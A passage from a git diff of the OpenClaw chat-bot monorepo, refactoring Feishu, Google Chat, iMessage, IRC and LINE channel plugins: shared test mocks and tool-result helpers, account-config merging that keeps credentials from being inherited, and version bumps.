); - await Promise.resolve(); - await Promise.resolve(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_bot_mention", text: "@bot second", - mentions: [ - { - key: "@_user_1", - id: { open_id: "ou_bot" }, - name: "bot", - }, - ], + mentions: [createMention({ openId: "ou_bot", name: "bot" })], }), ); - await Promise.resolve(); - await Promise.resolve(); await vi.advanceTimersByTimeAsync(25); expect(handleFeishuMessageMock).toHaveBeenCalledTimes(1); @@ -521,35 +500,24 @@ describe("Feishu inbound debounce regressions", () => { }); it("preserves bot mention signal when the latest merged message has no mentions", async () => { - vi.spyOn(dedup, "tryRecordMessage").mockReturnValue(true); - vi.spyOn(dedup, "tryRecordMessagePersistent").mockResolvedValue(true); - vi.spyOn(dedup, "hasRecordedMessage").mockReturnValue(false); - vi.spyOn(dedup, "hasRecordedMessagePersistent").mockResolvedValue(false); + setDedupPassThroughMocks(); const onMessage = await setupDebounceMonitor(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_bot_first", text: "@bot first", - mentions: [ - { - key: "@_user_1", - id: { open_id: "ou_bot" }, - name: "bot", - }, - ], + mentions: [createMention({ openId: "ou_bot", name: "bot" })], }), ); - await Promise.resolve(); - await Promise.resolve(); - await onMessage( + await enqueueDebouncedMessage( + onMessage, createTextEvent({ messageId: "om_plain_second", text: "plain follow-up", }), ); - await Promise.resolve(); - await Promise.resolve(); await vi.advanceTimersByTimeAsync(25); expect(handleFeishuMessageMock).toHaveBeenCalledTimes(1); diff --git a/extensions/feishu/src/monitor.startup.test.ts b/extensions/feishu/src/monitor.startup.test.ts index 29b00fab200..f5e19159f0a 100644 --- a/extensions/feishu/src/monitor.startup.test.ts +++ b/extensions/feishu/src/monitor.startup.test.ts @@ -3,17 +3,11 @@ import { afterEach, describe, expect, it, vi } from "vitest"; import { monitorFeishuProvider, stopFeishuMonitor } from "./monitor.js"; const probeFeishuMock = vi.hoisted(() => vi.fn()); - -vi.mock("./probe.js", () => ({ - probeFeishu: probeFeishuMock, -})); - -vi.mock("./client.js", () => ({ +const feishuClientMockModule = vi.hoisted(() => ({ createFeishuWSClient: vi.fn(() => ({ start: vi.fn() })), createEventDispatcher: vi.fn(() => ({ register: vi.fn() })), })); - -vi.mock("./runtime.js", () => ({ +const feishuRuntimeMockModule = vi.hoisted(() => ({ getFeishuRuntime: () => ({ channel: { debounce: { @@ -30,6 +24,13 @@ vi.mock("./runtime.js", () => ({ }), })); +vi.mock("./probe.js", () => ({ + probeFeishu: probeFeishuMock, +})); + +vi.mock("./client.js", () => feishuClientMockModule); +vi.mock("./runtime.js", () => feishuRuntimeMockModule); + function buildMultiAccountWebsocketConfig(accountIds: string[]): ClawdbotConfig { return { channels: { @@ -41,7 +42,7 @@ function buildMultiAccountWebsocketConfig(accountIds: string[]): ClawdbotConfig { enabled: true, appId: `cli_${accountId}`, - appSecret: `secret_${accountId}`, + appSecret: `secret_${accountId}`, // pragma: allowlist secret connectionMode: "websocket", }, ]), diff --git a/extensions/feishu/src/monitor.test-mocks.ts b/extensions/feishu/src/monitor.test-mocks.ts index 41e5d9c0086..276d6375464 100644 --- a/extensions/feishu/src/monitor.test-mocks.ts +++ b/extensions/feishu/src/monitor.test-mocks.ts @@ -1,12 +1,45 @@ import { vi } from "vitest"; -export const probeFeishuMock: ReturnType = vi.fn(); +export function createFeishuClientMockModule(): { + createFeishuWSClient: () => { start: () => void }; + createEventDispatcher: () => { register: () => void }; +} { + return { + createFeishuWSClient: vi.fn(() => ({ start: vi.fn() })), + createEventDispatcher: vi.fn(() => ({ register: vi.fn() })), + }; +} -vi.mock("./probe.js", () => ({ - probeFeishu: probeFeishuMock, -})); - -vi.mock("./client.js", () => ({ - createFeishuWSClient: vi.fn(() => ({ start: vi.fn() })), - createEventDispatcher: vi.fn(() => ({ register: vi.fn() })), -})); +export function createFeishuRuntimeMockModule(): { + getFeishuRuntime: () => { + channel: { + debounce: { + resolveInboundDebounceMs: () => number; + createInboundDebouncer: () => { + enqueue: () => Promise; + flushKey: () => Promise; + }; + }; + text: { + hasControlCommand: () => boolean; + }; + }; + }; +} { + return { + getFeishuRuntime: () => ({ + channel: { + debounce: { + resolveInboundDebounceMs: () => 0, + createInboundDebouncer: () => ({ + enqueue: async () => {}, + flushKey: async () => {}, + }), + }, + text: { + hasControlCommand: () => false, + }, + }, + }), + }; +} diff --git a/extensions/feishu/src/monitor.webhook-security.test.ts b/extensions/feishu/src/monitor.webhook-security.test.ts index d52b417009f..cc64291b4ef 100644 --- a/extensions/feishu/src/monitor.webhook-security.test.ts +++ b/extensions/feishu/src/monitor.webhook-security.test.ts @@ -2,6 +2,10 @@ import { createServer } from "node:http"; import type { AddressInfo } from "node:net"; import type { ClawdbotConfig } from "openclaw/plugin-sdk/feishu"; import { afterEach, describe, expect, it, vi } from "vitest"; +import { + createFeishuClientMockModule, + createFeishuRuntimeMockModule, +} from "./monitor.test-mocks.js"; const probeFeishuMock = vi.hoisted(() => vi.fn()); @@ -9,27 +13,8 @@ vi.mock("./probe.js", () => ({ probeFeishu: probeFeishuMock, })); -vi.mock("./client.js", () => ({ - createFeishuWSClient: vi.fn(() => ({ start: vi.fn() })), - createEventDispatcher: vi.fn(() => ({ register: vi.fn() })), -})); - -vi.mock("./runtime.js", () => ({ - getFeishuRuntime: () => ({ - channel: { - debounce: { - resolveInboundDebounceMs: () => 0, - createInboundDebouncer: () => ({ - enqueue: async () => {}, - flushKey: async () => {}, - }), - }, - text: { - hasControlCommand: () => false, - }, - }, - }), -})); +vi.mock("./client.js", () => createFeishuClientMockModule()); +vi.mock("./runtime.js", () => createFeishuRuntimeMockModule()); vi.mock("@larksuiteoapi/node-sdk", () => ({ adaptDefault: vi.fn( diff --git a/extensions/feishu/src/perm.ts b/extensions/feishu/src/perm.ts index 8ff1a794e29..a031bb015ef 100644 --- a/extensions/feishu/src/perm.ts +++ b/extensions/feishu/src/perm.ts @@ -3,15 +3,11 @@ import type { OpenClawPluginApi } from "openclaw/plugin-sdk/feishu"; import { listEnabledFeishuAccounts } from "./accounts.js"; import { FeishuPermSchema, type FeishuPermParams } from "./perm-schema.js"; import { createFeishuToolClient, resolveAnyEnabledFeishuToolsConfig } from "./tool-account.js"; - -// ============ Helpers ============ - -function json(data: unknown) { - return { - content: [{ type: "text" as const, text: JSON.stringify(data, null, 2) }], - details: data, - }; -} +import { + jsonToolResult, + toolExecutionErrorResult, + unknownToolActionResult, +} from "./tool-result.js"; type ListTokenType = | "doc" @@ -154,21 +150,21 @@ export function registerFeishuPermTools(api: OpenClawPluginApi) { }); switch (p.action) { case "list": - return json(await listMembers(client, p.token, p.type)); + return jsonToolResult(await listMembers(client, p.token, p.type)); case "add": - return json( + return jsonToolResult( await addMember(client, p.token, p.type, p.member_type, p.member_id, p.perm), ); case "remove": - return json( + return jsonToolResult( await removeMember(client, p.token, p.type, p.member_type, p.member_id), ); default: // eslint-disable-next-line @typescript-eslint/no-explicit-any -- exhaustive check fallback - return json({ error: `Unknown action: ${(p as any).action}` }); + return unknownToolActionResult((p as { action?: unknown }).action); } } catch (err) { - return json({ error: err instanceof Error ? err.message : String(err) }); + return toolExecutionErrorResult(err); } }, }; diff --git a/extensions/feishu/src/reply-dispatcher.test.ts b/extensions/feishu/src/reply-dispatcher.test.ts index 3f464a88318..b7a1292a4f9 100644 --- a/extensions/feishu/src/reply-dispatcher.test.ts +++ b/extensions/feishu/src/reply-dispatcher.test.ts @@ -219,6 +219,17 @@ describe("createFeishuReplyDispatcher streaming behavior", () => { expect(sendMediaFeishuMock).not.toHaveBeenCalled(); }); + it("sets disableBlockStreaming in replyOptions to prevent silent reply drops", async () => { + const result = createFeishuReplyDispatcher({ + cfg: {} as never, + agentId: "agent", + runtime: {} as never, + chatId: "oc_chat", + }); + + expect(result.replyOptions).toHaveProperty("disableBlockStreaming", true); + }); + it("uses streaming session for auto mode markdown payloads", async () => { createFeishuReplyDispatcher({ cfg: {} as never, diff --git a/extensions/feishu/src/reply-dispatcher.ts b/extensions/feishu/src/reply-dispatcher.ts index c754bce5c16..3bd1353825d 100644 --- a/extensions/feishu/src/reply-dispatcher.ts +++ b/extensions/feishu/src/reply-dispatcher.ts @@ -382,6 +382,7 @@ export function createFeishuReplyDispatcher(params: CreateFeishuReplyDispatcherP replyOptions: { ...replyOptions, onModelSelected: prefixContext.onModelSelected, + disableBlockStreaming: true, onPartialReply: streamingEnabled ? (payload: ReplyPayload) => { if (!payload.text) { diff --git a/extensions/feishu/src/send-message.ts b/extensions/feishu/src/send-message.ts new file mode 100644 index 00000000000..21772ec374f --- /dev/null +++ b/extensions/feishu/src/send-message.ts @@ -0,0 +1,71 @@ +import { assertFeishuMessageApiSuccess, toFeishuSendResult } from "./send-result.js"; + +type FeishuMessageClient = { + im: { + message: { + reply: (params: { + path: { message_id: string }; + data: Record; + }) => Promise<{ code?: number; msg?: string; data?: { message_id?: string } }>; + create: (params: { + params: { receive_id_type: string }; + data: Record; + }) => Promise<{ code?: number; msg?: string; data?: { message_id?: string } }>; + }; + }; +}; + +export async function sendFeishuMessageWithOptionalReply(params: { + client: FeishuMessageClient; + receiveId: string; + receiveIdType: string; + content: string; + msgType: string; + replyToMessageId?: string; + replyInThread?: boolean; + sendErrorPrefix: string; + replyErrorPrefix: string; + fallbackSendErrorPrefix?: string; + shouldFallbackFromReply?: (response: { code?: number; msg?: string }) => boolean; +}): Promise<{ messageId: string; chatId: string }> { + const data = { + content: params.content, + msg_type: params.msgType, + }; + + if (params.replyToMessageId) { + const response = await params.client.im.message.reply({ + path: { message_id: params.replyToMessageId }, + data: { + ...data, + ...(params.replyInThread ? { reply_in_thread: true } : {}), + }, + }); + if (params.shouldFallbackFromReply?.(response)) { + const fallback = await params.client.im.message.create({ + params: { receive_id_type: params.receiveIdType }, + data: { + receive_id: params.receiveId, + ...data, + }, + }); + assertFeishuMessageApiSuccess( + fallback, + params.fallbackSendErrorPrefix ?? params.sendErrorPrefix, + ); + return toFeishuSendResult(fallback, params.receiveId); + } + assertFeishuMessageApiSuccess(response, params.replyErrorPrefix); + return toFeishuSendResult(response, params.receiveId); + } + + const response = await params.client.im.message.create({ + params: { receive_id_type: params.receiveIdType }, + data: { + receive_id: params.receiveId, + ...data, + }, + }); + assertFeishuMessageApiSuccess(response, params.sendErrorPrefix); + return toFeishuSendResult(response, params.receiveId); +} diff --git a/extensions/feishu/src/tool-result.test.ts b/extensions/feishu/src/tool-result.test.ts new file mode 100644 index 00000000000..d4538133872 --- /dev/null +++ b/extensions/feishu/src/tool-result.test.ts @@ -0,0 +1,32 @@ +import { describe, expect, it } from "vitest"; +import { + jsonToolResult, + toolExecutionErrorResult, + unknownToolActionResult, +} from "./tool-result.js"; + +describe("jsonToolResult", () => { + it("formats tool result with text content and details", () => { + const payload = { ok: true, id: "abc" }; + expect(jsonToolResult(payload)).toEqual({ + content: [{ type: "text", text: JSON.stringify(payload, null, 2) }], + details: payload, + }); + }); + + it("formats unknown action errors", () => { + expect(unknownToolActionResult("create")).toEqual({ + content: [ + { type: "text", text: JSON.stringify({ error: "Unknown action: create" }, null, 2) }, + ], + details: { error: "Unknown action: create" }, + }); + }); + + it("formats execution errors", () => { + expect(toolExecutionErrorResult(new Error("boom"))).toEqual({ + content: [{ type: "text", text: JSON.stringify({ error: "boom" }, null, 2) }], + details: { error: "boom" }, + }); + }); +}); diff --git a/extensions/feishu/src/tool-result.ts b/extensions/feishu/src/tool-result.ts new file mode 100644 index 00000000000..d45bb0cf1c0 --- /dev/null +++ b/extensions/feishu/src/tool-result.ts @@ -0,0 +1,14 @@ +export function jsonToolResult(data: unknown) { + return { + content: [{ type: "text" as const, text: JSON.stringify(data, null, 2) }], + details: data, + }; +} + +export function unknownToolActionResult(action: unknown) { + return jsonToolResult({ error: `Unknown action: ${String(action)}` }); +} + +export function toolExecutionErrorResult(error: unknown) { + return jsonToolResult({ error: error instanceof Error ? error.message : String(error) }); +} diff --git a/extensions/feishu/src/wiki.ts b/extensions/feishu/src/wiki.ts index ef74b5dc0a7..e701f57b3aa 100644 --- a/extensions/feishu/src/wiki.ts +++ b/extensions/feishu/src/wiki.ts @@ -2,17 +2,13 @@ import type * as Lark from "@larksuiteoapi/node-sdk"; import type { OpenClawPluginApi } from "openclaw/plugin-sdk/feishu"; import { listEnabledFeishuAccounts } from "./accounts.js"; import { createFeishuToolClient, resolveAnyEnabledFeishuToolsConfig } from "./tool-account.js"; +import { + jsonToolResult, + toolExecutionErrorResult, + unknownToolActionResult, +} from "./tool-result.js"; import { FeishuWikiSchema, type FeishuWikiParams } from "./wiki-schema.js"; -// ============ Helpers ============ - -function json(data: unknown) { - return { - content: [{ type: "text" as const, text: JSON.stringify(data, null, 2) }], - details: data, - }; -} - type ObjType = "doc" | "sheet" | "mindnote" | "bitable" | "file" | "docx" | "slides"; // ============ Actions ============ @@ -194,22 +190,22 @@ export function registerFeishuWikiTools(api: OpenClawPluginApi) { }); switch (p.action) { case "spaces": - return json(await listSpaces(client)); + return jsonToolResult(await listSpaces(client)); case "nodes": - return json(await listNodes(client, p.space_id, p.parent_node_token)); + return jsonToolResult(await listNodes(client, p.space_id, p.parent_node_token)); case "get": - return json(await getNode(client, p.token)); + return jsonToolResult(await getNode(client, p.token)); case "search": - return json({ + return jsonToolResult({ error: "Search is not available. Use feishu_wiki with action: 'nodes' to browse or action: 'get' to lookup by token.", }); case "create": - return json( + return jsonToolResult( await createNode(client, p.space_id, p.title, p.obj_type, p.parent_node_token), ); case "move": - return json( + return jsonToolResult( await moveNode( client, p.space_id, @@ -219,13 +215,13 @@ export function registerFeishuWikiTools(api: OpenClawPluginApi) { ), ); case "rename": - return json(await renameNode(client, p.space_id, p.node_token, p.title)); + return jsonToolResult(await renameNode(client, p.space_id, p.node_token, p.title)); default: // eslint-disable-next-line @typescript-eslint/no-explicit-any -- exhaustive check fallback - return json({ error: `Unknown action: ${(p as any).action}` }); + return unknownToolActionResult((p as { action?: unknown }).action); } } catch (err) { - return json({ error: err instanceof Error ? err.message : String(err) }); + return toolExecutionErrorResult(err); } }, }; diff --git a/extensions/google-gemini-cli-auth/package.json b/extensions/google-gemini-cli-auth/package.json index f655b794c32..de9d3b8fab6 100644 --- a/extensions/google-gemini-cli-auth/package.json +++ b/extensions/google-gemini-cli-auth/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/google-gemini-cli-auth", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Gemini CLI OAuth provider plugin", "type": "module", diff --git a/extensions/googlechat/package.json b/extensions/googlechat/package.json index 4c19fd26af6..ca55508dba8 100644 --- a/extensions/googlechat/package.json +++ b/extensions/googlechat/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/googlechat", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Google Chat channel plugin", "type": "module", diff --git a/extensions/googlechat/src/accounts.test.ts b/extensions/googlechat/src/accounts.test.ts new file mode 100644 index 00000000000..18256688971 --- /dev/null +++ b/extensions/googlechat/src/accounts.test.ts @@ -0,0 +1,131 @@ +import type { OpenClawConfig } from "openclaw/plugin-sdk/googlechat"; +import { describe, expect, it } from "vitest"; +import { resolveGoogleChatAccount } from "./accounts.js"; + +describe("resolveGoogleChatAccount", () => { + it("inherits shared defaults from accounts.default for named accounts", () => { + const cfg: OpenClawConfig = { + channels: { + googlechat: { + accounts: { + default: { + audienceType: "app-url", + audience: "https://example.com/googlechat", + webhookPath: "/googlechat", + }, + andy: { + serviceAccountFile: "/tmp/andy-sa.json", + }, + }, + }, + }, + }; + + const resolved = resolveGoogleChatAccount({ cfg, accountId: "andy" }); + expect(resolved.config.audienceType).toBe("app-url"); + expect(resolved.config.audience).toBe("https://example.com/googlechat"); + expect(resolved.config.webhookPath).toBe("/googlechat"); + expect(resolved.config.serviceAccountFile).toBe("/tmp/andy-sa.json"); + }); + + it("prefers top-level and account overrides over accounts.default", () => { + const cfg: OpenClawConfig = { + channels: { + googlechat: { + audienceType: "project-number", + audience: "1234567890", + accounts: { + default: { + audienceType: "app-url", + audience: "https://default.example.com/googlechat", + webhookPath: "/googlechat-default", + }, + april: { + webhookPath: "/googlechat-april", + }, + }, + }, + }, + }; + + const resolved = resolveGoogleChatAccount({ cfg, accountId: "april" }); + expect(resolved.config.audienceType).toBe("project-number"); + expect(resolved.config.audience).toBe("1234567890"); + expect(resolved.config.webhookPath).toBe("/googlechat-april"); + }); + + it("does not inherit disabled state from accounts.default for named accounts", () => { + const cfg: OpenClawConfig = { + channels: { + googlechat: { + accounts: { + default: { + enabled: false, + audienceType: "app-url", + audience: "https://example.com/googlechat", + }, + andy: { + serviceAccountFile: "/tmp/andy-sa.json", + }, + }, + }, + }, + }; + + const resolved = resolveGoogleChatAccount({ cfg, accountId: "andy" }); + expect(resolved.enabled).toBe(true); + expect(resolved.config.enabled).toBeUndefined(); + expect(resolved.config.audienceType).toBe("app-url"); + }); + + it("does not inherit default-account credentials into named accounts", () => { + const cfg: OpenClawConfig = { + channels: { + googlechat: { + accounts: { + default: { + serviceAccountRef: { + source: "env", + provider: "test", + id: "default-sa", + }, + audienceType: "app-url", + audience: "https://example.com/googlechat", + }, + andy: { + serviceAccountFile: "/tmp/andy-sa.json", + }, + }, + }, + }, + }; + + const resolved = resolveGoogleChatAccount({ cfg, accountId: "andy" }); + expect(resolved.credentialSource).toBe("file"); + expect(resolved.credentialsFile).toBe("/tmp/andy-sa.json"); + expect(resolved.config.audienceType).toBe("app-url"); + }); + + it("does not inherit dangerous name matching from accounts.default", () => { + const cfg: OpenClawConfig = { + channels: { + googlechat: { + accounts: { + default: { + dangerouslyAllowNameMatching: true, + audienceType: "app-url", + audience: "https://example.com/googlechat", + }, + andy: { + serviceAccountFile: "/tmp/andy-sa.json", + }, + }, + }, + }, + }; + + const resolved = resolveGoogleChatAccount({ cfg, accountId: "andy" }); + expect(resolved.config.dangerouslyAllowNameMatching).toBeUndefined(); + expect(resolved.config.audienceType).toBe("app-url"); + }); +}); diff --git a/extensions/googlechat/src/accounts.ts b/extensions/googlechat/src/accounts.ts index 537c898d77e..f597efbece4 100644 --- a/extensions/googlechat/src/accounts.ts +++ b/extensions/googlechat/src/accounts.ts @@ -71,8 +71,22 @@ function mergeGoogleChatAccountConfig( ): GoogleChatAccountConfig { const raw = cfg.channels?.["googlechat"] ?? {}; const { accounts: _ignored, defaultAccount: _ignored2, ...base } = raw; + const defaultAccountConfig = resolveAccountConfig(cfg, DEFAULT_ACCOUNT_ID) ?? {}; const account = resolveAccountConfig(cfg, accountId) ?? {}; - return { ...base, ...account } as GoogleChatAccountConfig; + if (accountId === DEFAULT_ACCOUNT_ID) { + return { ...base, ...defaultAccountConfig } as GoogleChatAccountConfig; + } + const { + enabled: _ignoredEnabled, + dangerouslyAllowNameMatching: _ignoredDangerouslyAllowNameMatching, + serviceAccount: _ignoredServiceAccount, + serviceAccountRef: _ignoredServiceAccountRef, + serviceAccountFile: _ignoredServiceAccountFile, + ...defaultAccountShared + } = defaultAccountConfig; + // In multi-account setups, allow accounts.default to provide shared defaults + // (for example webhook/audience fields) while preserving top-level and account overrides. + return { ...defaultAccountShared, ...base, ...account } as GoogleChatAccountConfig; } function parseServiceAccount(value: unknown): Record | null { diff --git a/extensions/googlechat/src/monitor-webhook.ts b/extensions/googlechat/src/monitor-webhook.ts index 4272b2bfa87..5f380722267 100644 --- a/extensions/googlechat/src/monitor-webhook.ts +++ b/extensions/googlechat/src/monitor-webhook.ts @@ -25,6 +25,7 @@ function extractBearerToken(header: unknown): string { type ParsedGoogleChatInboundPayload = | { ok: true; event: GoogleChatEvent; addOnBearerToken: string } | { ok: false }; +type ParsedGoogleChatInboundSuccess = Extract; function parseGoogleChatInboundPayload( raw: unknown, @@ -116,6 +117,23 @@ export function createGoogleChatWebhookRequestHandler(params: { const headerBearer = extractBearerToken(req.headers.authorization); let selectedTarget: WebhookTarget | null = null; let parsedEvent: GoogleChatEvent | null = null; + const readAndParseEvent = async ( + profile: "pre-auth" | "post-auth", + ): Promise => { + const body = await readJsonWebhookBodyOrReject({ + req, + res, + profile, + emptyObjectOnEmpty: false, + invalidJsonMessage: "invalid payload", + }); + if (!body.ok) { + return null; + } + + const parsed = parseGoogleChatInboundPayload(body.value, res); + return parsed.ok ? parsed : null; + }; if (headerBearer) { selectedTarget = await resolveWebhookTargetWithAuthOrReject({ @@ -134,36 +152,14 @@ export function createGoogleChatWebhookRequestHandler(params: { return true; } - const body = await readJsonWebhookBodyOrReject({ - req, - res, - profile: "post-auth", - emptyObjectOnEmpty: false, - invalidJsonMessage: "invalid payload", - }); - if (!body.ok) { - return true; - } - - const parsed = parseGoogleChatInboundPayload(body.value, res); - if (!parsed.ok) { + const parsed = await readAndParseEvent("post-auth"); + if (!parsed) { return true; } parsedEvent = parsed.event; } else { - const body = await readJsonWebhookBodyOrReject({ - req, - res, - profile: "pre-auth", - emptyObjectOnEmpty: false, - invalidJsonMessage: "invalid payload", - }); - if (!body.ok) { - return true; - } - - const parsed = parseGoogleChatInboundPayload(body.value, res); - if (!parsed.ok) { + const parsed = await readAndParseEvent("pre-auth"); + if (!parsed) { return true; } parsedEvent = parsed.event; diff --git a/extensions/imessage/package.json b/extensions/imessage/package.json index 4c29501f7d0..d4562e6e42c 100644 --- a/extensions/imessage/package.json +++ b/extensions/imessage/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/imessage", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw iMessage channel plugin", "type": "module", diff --git a/extensions/imessage/src/channel.ts b/extensions/imessage/src/channel.ts index 0835f6734ad..8c77f2a94bf 100644 --- a/extensions/imessage/src/channel.ts +++ b/extensions/imessage/src/channel.ts @@ -1,6 +1,7 @@ import { applyAccountNameToChannelSection, buildChannelConfigSchema, + collectStatusIssuesFromLastError, DEFAULT_ACCOUNT_ID, deleteAccountFromConfigSection, formatPairingApproveHint, @@ -266,21 +267,7 @@ export const imessagePlugin: ChannelPlugin = { cliPath: null, dbPath: null, }, - collectStatusIssues: (accounts) => - accounts.flatMap((account) => { - const lastError = typeof account.lastError === "string" ? account.lastError.trim() : ""; - if (!lastError) { - return []; - } - return [ - { - channel: "imessage", - accountId: account.accountId, - kind: "runtime", - message: `Channel error: ${lastError}`, - }, - ]; - }), + collectStatusIssues: (accounts) => collectStatusIssuesFromLastError("imessage", accounts), buildChannelSummary: ({ snapshot }) => ({ configured: snapshot.configured ?? false, running: snapshot.running ?? false, diff --git a/extensions/irc/package.json b/extensions/irc/package.json index 2de9a5afb0b..bb41c1d9e02 100644 --- a/extensions/irc/package.json +++ b/extensions/irc/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/irc", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw IRC channel plugin", "type": "module", "dependencies": { diff --git a/extensions/irc/src/inbound.ts b/extensions/irc/src/inbound.ts index 2c3378de1c1..6c03ebadf02 100644 --- a/extensions/irc/src/inbound.ts +++ b/extensions/irc/src/inbound.ts @@ -1,8 +1,7 @@ import { GROUP_POLICY_BLOCKED_LABEL, createScopedPairingAccess, - createNormalizedOutboundDeliverer, - createReplyPrefixOptions, + dispatchInboundReplyWithBase, formatTextWithAttachmentLinks, logInboundDrop, isDangerousNameMatchingEnabled, @@ -332,44 +331,31 @@ export async function handleIrcInbound(params: { CommandAuthorized: commandAuthorized, }); - await core.channel.session.recordInboundSession({ + await dispatchInboundReplyWithBase({ + cfg: config as OpenClawConfig, + channel: CHANNEL_ID, + accountId: account.accountId, + route, storePath, - sessionKey: ctxPayload.SessionKey ?? route.sessionKey, - ctx: ctxPayload, + ctxPayload, + core, + deliver: async (payload) => { + await deliverIrcReply({ + payload, + target: peerId, + accountId: account.accountId, + sendReply: params.sendReply, + statusSink, + }); + }, onRecordError: (err) => { runtime.error?.(`irc: failed updating session meta: ${String(err)}`); }, - }); - - const { onModelSelected, ...prefixOptions } = createReplyPrefixOptions({ - cfg: config as OpenClawConfig, - agentId: route.agentId, - channel: CHANNEL_ID, - accountId: account.accountId, - }); - const deliverReply = createNormalizedOutboundDeliverer(async (payload) => { - await deliverIrcReply({ - payload, - target: peerId, - accountId: account.accountId, - sendReply: params.sendReply, - statusSink, - }); - }); - - await core.channel.reply.dispatchReplyWithBufferedBlockDispatcher({ - ctx: ctxPayload, - cfg: config as OpenClawConfig, - dispatcherOptions: { - ...prefixOptions, - deliver: deliverReply, - onError: (err, info) => { - runtime.error?.(`irc ${info.kind} reply failed: ${String(err)}`); - }, + onDispatchError: (err, info) => { + runtime.error?.(`irc ${info.kind} reply failed: ${String(err)}`); }, replyOptions: { skillFilter: groupMatch.groupConfig?.skills, - onModelSelected, disableBlockStreaming: typeof account.config.blockStreaming === "boolean" ? !account.config.blockStreaming diff --git a/extensions/line/package.json b/extensions/line/package.json index e300f54ee74..cef43060dcc 100644 --- a/extensions/line/package.json +++ b/extensions/line/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/line", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw LINE channel plugin", "type": "module", diff --git a/extensions/line/src/channel.ts b/extensions/line/src/channel.ts index c29046eaaf0..69491cf61f2 100644 --- a/extensions/line/src/channel.ts +++ b/extensions/line/src/channel.ts @@ -1,6 +1,8 @@ import { buildChannelConfigSchema, + buildComputedAccountStatusSnapshot, buildTokenChannelStatusSummary, + clearAccountEntryFields, DEFAULT_ACCOUNT_ID, LineConfigSchema, processLineMessage, @@ -27,6 +29,42 @@ const meta = { systemImage: "message.fill", }; +function patchLineAccountConfig( + cfg: OpenClawConfig, + lineConfig: LineConfig, + accountId: string, + patch: Record, +): OpenClawConfig { + if (accountId === DEFAULT_ACCOUNT_ID) { + return { + ...cfg, + channels: { + ...cfg.channels, + line: { + ...lineConfig, + ...patch, + }, + }, + }; + } + return { + ...cfg, + channels: { + ...cfg.channels, + line: { + ...lineConfig, + accounts: { + ...lineConfig.accounts, + [accountId]: { + ...lineConfig.accounts?.[accountId], + ...patch, + }, + }, + }, + }, + }; +} + export const linePlugin: ChannelPlugin = { id: "line", meta: { @@ -67,34 +105,7 @@ export const linePlugin: ChannelPlugin = { defaultAccountId: (cfg) => getLineRuntime().channel.line.resolveDefaultLineAccountId(cfg), setAccountEnabled: ({ cfg, accountId, enabled }) => { const lineConfig = (cfg.channels?.line ?? {}) as LineConfig; - if (accountId === DEFAULT_ACCOUNT_ID) { - return { - ...cfg, - channels: { - ...cfg.channels, - line: { - ...lineConfig, - enabled, - }, - }, - }; - } - return { - ...cfg, - channels: { - ...cfg.channels, - line: { - ...lineConfig, - accounts: { - ...lineConfig.accounts, - [accountId]: { - ...lineConfig.accounts?.[accountId], - enabled, - }, - }, - }, - }, - }; + return patchLineAccountConfig(cfg, lineConfig, accountId, { enabled }); }, deleteAccount: ({ cfg, accountId }) => { const lineConfig = (cfg.channels?.line ?? {}) as LineConfig; @@ -224,34 +235,7 @@ export const linePlugin: ChannelPlugin = { getLineRuntime().channel.line.normalizeAccountId(accountId), applyAccountName: ({ cfg, accountId, name }) => { const lineConfig = (cfg.channels?.line ?? {}) as LineConfig; - if (accountId === DEFAULT_ACCOUNT_ID) { - return { - ...cfg, - channels: { - ...cfg.channels, - line: { - ...lineConfig, - name, - }, - }, - }; - } - return { - ...cfg, - channels: { - ...cfg.channels, - line: { - ...lineConfig, - accounts: { - ...lineConfig.accounts, - [accountId]: { - ...lineConfig.accounts?.[accountId], - name, - }, - }, - }, - }, - }; + return patchLineAccountConfig(cfg, lineConfig, accountId, { name }); }, validateInput: ({ accountId, input }) => { const typedInput = input as { @@ -615,20 +599,18 @@ export const linePlugin: ChannelPlugin = { const configured = Boolean( account.channelAccessToken?.trim() && account.channelSecret?.trim(), ); - return { + const base = buildComputedAccountStatusSnapshot({ accountId: account.accountId, name: account.name, enabled: account.enabled, configured, - tokenSource: account.tokenSource, - running: runtime?.running ?? false, - lastStartAt: runtime?.lastStartAt ?? null, - lastStopAt: runtime?.lastStopAt ?? null, - lastError: runtime?.lastError ?? null, - mode: "webhook", + runtime, probe, - lastInboundAt: runtime?.lastInboundAt ?? null, - lastOutboundAt: runtime?.lastOutboundAt ?? null, + }); + return { + ...base, + tokenSource: account.tokenSource, + mode: "webhook", }; }, }, @@ -699,39 +681,21 @@ export const linePlugin: ChannelPlugin = { } } - const accounts = nextLine.accounts ? { ...nextLine.accounts } : undefined; - if (accounts && accountId in accounts) { - const entry = accounts[accountId]; - if (entry && typeof entry === "object") { - const nextEntry = { ...entry } as Record; - if ( - "channelAccessToken" in nextEntry || - "channelSecret" in nextEntry || - "tokenFile" in nextEntry || - "secretFile" in nextEntry - ) { - cleared = true; - delete nextEntry.channelAccessToken; - delete nextEntry.channelSecret; - delete nextEntry.tokenFile; - delete nextEntry.secretFile; - changed = true; - } - if (Object.keys(nextEntry).length === 0) { - delete accounts[accountId]; - changed = true; - } else { - accounts[accountId] = nextEntry as typeof entry; - } + const accountCleanup = clearAccountEntryFields({ + accounts: nextLine.accounts, + accountId, + fields: ["channelAccessToken", "channelSecret", "tokenFile", "secretFile"], + markClearedOnFieldPresence: true, + }); + if (accountCleanup.changed) { + changed = true; + if (accountCleanup.cleared) { + cleared = true; } - } - - if (accounts) { - if (Object.keys(accounts).length === 0) { - delete nextLine.accounts; - changed = true; + if (accountCleanup.nextAccounts) { + nextLine.accounts = accountCleanup.nextAccounts; } else { - nextLine.accounts = accounts; + delete nextLine.accounts; } } diff --git a/extensions/llm-task/package.json b/extensions/llm-task/package.json index 2e925f7191b..9203bc54c4c 100644 --- a/extensions/llm-task/package.json +++ b/extensions/llm-task/package.json @@ -1,6 +1,6 @@ { "name": 